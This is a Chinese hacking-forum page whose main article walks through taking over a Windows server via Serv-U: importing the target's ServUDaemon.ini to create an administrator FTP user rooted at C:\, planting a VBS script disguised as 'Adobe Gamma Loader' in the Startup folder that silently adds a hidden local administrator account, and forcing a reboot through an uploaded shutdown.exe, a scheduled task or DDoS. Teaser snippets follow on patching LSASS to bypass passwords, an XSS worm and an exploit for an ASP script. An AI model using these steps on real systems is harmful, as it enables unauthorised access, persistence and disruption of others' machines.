Serv-U 用户的另类盗取
所属分类:
实用技巧 / 漏洞研究
阅读数:
395
收藏 0赞 0分享
注:在此之前最好在自己的机器上装一个Serv-U,
我们先看看ServUStartUpLog.txt
Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat
。。。。。。。。。。
版本挺新阿,呵呵
接着看看ServUDaemon.ini(用户配置文件)
哇考,里面的用户真多阿!
接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\
哈哈哈,到次为止大家都知道我的用意了把!
接这ftp上去
哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u)
由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了!
我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader,这样管理员不容易发现!
脚本内容:
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user allen ***** /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0)
大家都能看懂把,哈哈
然后把他传到Documents and Settings\All Users\「开始」菜单\程序\启动\
呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。
接着用asp木马上传一个shutdown.exe
然后执行shutdown.exe 127.0.0.1 /r
哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。
不过在nt or 2000上普通用户都可以重起机器
还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了!
如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的)
MySQL Proxy(解决注入的另一思路)
MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
收藏 0赞 0分享
分析NtGodMode.exe干了什么
NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0 这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1 为什么mov al,1,以后就不用密码了?
收藏 0赞 0分享
伯乐asp收信程序漏洞及利用程序利用代码
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
发这个也是因为看了asm所写的新概念收信程序 箱子永远不会被黑
收藏 0赞 0分享
字符集导致的浏览器跨站脚本攻击分析
前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
收藏 0赞 0分享
Search Engine XSS Worm
作者:余弦
来源:0x37 Security
有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。
收藏 0赞 0分享
暂时屏蔽 IE 最新 0day的4 种方法
IE 最新 0day 波及了微软全线系统居然在2008年12月14日8:00:15还没有出补丁!我查看微软站点,好像有几个手动操作的办法暂时屏蔽。
收藏 0赞 0分享
查看更多